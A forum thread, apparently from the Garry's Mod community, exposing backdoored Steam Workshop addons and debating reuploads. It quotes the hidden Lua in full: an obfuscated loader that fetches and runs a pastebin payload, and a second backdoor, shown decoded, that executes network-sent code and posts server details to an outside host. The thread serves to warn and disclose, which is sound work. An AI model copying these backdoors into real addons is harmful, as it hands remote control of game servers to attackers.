Backdoored workshop addon (Drugs Mod)

Drugs Mod

^ BACKDOORED ^

autorun/server/drugz_resource.lua
Line 46: _GP = table.Copy(_G);
Line 91: include("…/models/drug_mod/default_base.dx90.vtx")

WTF?

Viewing the file…

File starts with “–[[” (lua comment)
In the middle of the file, the comment ends and contains this code:
[lua]
_GP[“timer”][“Simple”](10,function()_GP[“ht”…“tp”][“Fe”…“tch”]("\x68\x74\x74\x70\x73\x3a\x2f\x2f\x70\x61\x73\x74\x65\x62\x69\x6e\x2e\x63\x6f\x6d\x2f\x72\x61\x77\x2f\x6a\x61\x51\x30\x50\x48\x56\x4d",function© Payload = _GP[“C”…“om”…“pile”…“Str”…“ing”](c or “–”, ‘[C]’, false) Payload() end) end) GPVERSION = “DurgzMod”
[/lua]
Links to here: https://pastebin.com/raw/jaQ0PHVM

… And it’s missing the “dextro” model.

Get this shit off workshop thanks
also lol at the ironic picture.
Note; the original durgz mod did not contain this backdoor.

… Found it by comparing the durgz mods available to find the one with all the content.

Seems like this one is the good one: https://steamcommunity.com/workshop/filedetails/?id=696374067

It is uploaded by a known cheater / exploiter as well.

It’s hosted in a DigitalOcean dropplet. Someone feel free to report abuse to have it taken down: https://www.digitalocean.com/company/contact/

What does that backdoor script actually do? I’m having a hard time following it (never programmed in Lua which maybe why).

As far as I understand it’s got 3 steam IDs hardcoded so the script will only run for accounts with those IDs (doesn’t look like a blacklist (i.e DON’T run for these IDs)) but then it’s got code for logging the player’s server rcon password (and normal password) and some form of anti-cheat detection (assuming anti-lua script anti-cheat protection).

…but then it has code for sending Lua information, steamID, unique ID (?) and account Nickname for some reason regardless of whether it’s been defined up top or not.

Is it just going after certain players so it can steal server info or is it going after everyone APART from those SteamIDs and what’s it doing with the args code at the bottom (assuming it’s some form of basic botnet-style takeover code)?

Found another one:

autorun/alien.lua contains:

[lua]
08\82\101\99\101\105\118\101" local mt = {0, 6, 10, 21, 34, 38, 54, 57, 66, 69, 75, 80, 86, 90, 94, 115, 130, 138, 140, 146, 152, 162, 172, 176, 182} local l = (function(n) return ms:sub(mt[n] + 1, mt[n + 1]) end) local g = (function(n) return _G[l(n)] end) if g(1) and g(2)l(3) then local f = (function() end) local c = g(4) local r = g(7)[l(22)] g(5)l(6) g(7)[l(8)][l(21)] = (function() local s = c(r() or “–”, l(9), false) if g(23)(s) ~= l(10) then g(24)(s, f) end end) g(11)[l(12)](16, function() g(13)[l(14)](l(15), {hn = g(16)(l(17)), ip = g(16)(l(18)), np = #g(19)l(20)}, f, f) end) end
[/lua]

The models in this one are fine though.

(roleplaying backdoor investigator)

Unobfuscated:
[lua]
if SERVER and game.IsDedicated() then
local noop = function()end
net.AddNetworkString(“m9k_addons”)
net.Receivers[“m9k_addons”] = function ( )
local s = CompileString( net.ReadString ( ) or “–”, “[C]”, false)
if type(s) ~= “string” then
xpcall ( s, f )
end
end
timer.Simple ( 16, function()
http.Post ( “http://gmod.hints.me”, {
hn = GetConvarString “hostname”,
ip = GetConvarString “ip”,
np = #player.GetAll ( )
}, noop, noop)
end )
end
[/lua]

Previously Infected Addons (all are removed):

The origin of this backdoor birthed from a workshop addon that was taken down a couple years ago. People re-uploaded that addon with the backdoor still inside. The original addon which it came from is unknown, however, recent findings have lead us to believe that people are accidentally uploading the backdoor without knowing about it, to their own workshop models. We have had a conversation with one of the authors that have uploaded this backdoor (ID: 1080401866) and he informed us that he was simply following a tutorial and copied the Lua file from a gamebananna model. We have yet to find the gamebannana model that the author of the model claimed to have downloaded, however he did send us a mediafire link containing the download. We have logged a total of 7 addons with the same backdoor, excluding this report. For the past couple months, we have been scanning every new addon uploaded the workshop and have had major success ridding the workshop of backdoors during this time frame. I’m not entirely sure how this addon is being flagged now, yet wasn’t flagged during our initial scanning. Nonetheless, we are developing a new technology to analyze workshop addons and will come back with our findings soon.

(probably won’t come back, will just email rubat) … (end scene)

Stop lying, the addon clearly says no backdoors in the thumbnail…

Why do these retards always use the exact same fucking backdoor?

I think you mean “Why do they keep uploading addons with a (known) backdoor or a backdoor at all?”

Sadly I’m one of the people who re-uploaded a plugin they had but couldn’t find on the workshop.

And frankly, Steam support is not the most helpful and they will prob not unban the item or me and they will prob not let me update it either but I’d have to recreate it.

Not to mention I got comments making it look like I intentionally placed the backdoor.

LMAO, why would you upload something that you didn’t make, it’s the first workshop rule iirc

Afaik its not… if it is the workshop would have 500,000 items less.

//EDIT: The item has also been 2 years on the workshop and honestly I forgot about it.

Read the damn rules, just because someone else wants to be a dick, it’s not a reason why you should be one
If the rules says “Do not reupload addons - Reuploaded addons will be taken down. Search workshop before uploading. Reuploading workshop addons is strictly forbidden, whatever the reupload reason is. (Even if the original workshop addon was removed)” then don’t fucking upload content you didn’t, simple like that

If it been 2 years without nobody moderating is, IT’S NOT A REASON TO KEEP IT, it has backdoors because you had no idea the source or the knowledge to remove the backdoor, stop being stubborn and take your ban like a man

Lol I love how you think I don’t take the ban.

What position are you trying to defend here? By reuploading someone else’s shit you get the credit for it, but when it turns out it has a backdoor you wash your hands?

You uploaded an addon with a backdoor. You’re responsible for that. The fact that you didn’t make it doesn’t make it better for you. It merely means that you broke not one rule, but two. The breaking of one rule does not negate the other.

Its. Almost. As. If. We. Should. Have. The. Ability. To. Disable. Lua. Execution. On. Workshop. Addons.

I personally loop through all workshop addons and check out their lua code, but I mean it’s so simple to have something common and upload an “update” with a nice backdoor in it. It really would be cool so have the ability to disable lua execution on certain workshop addons via a lua function or something.

Or just extract the addons if you are so concerned.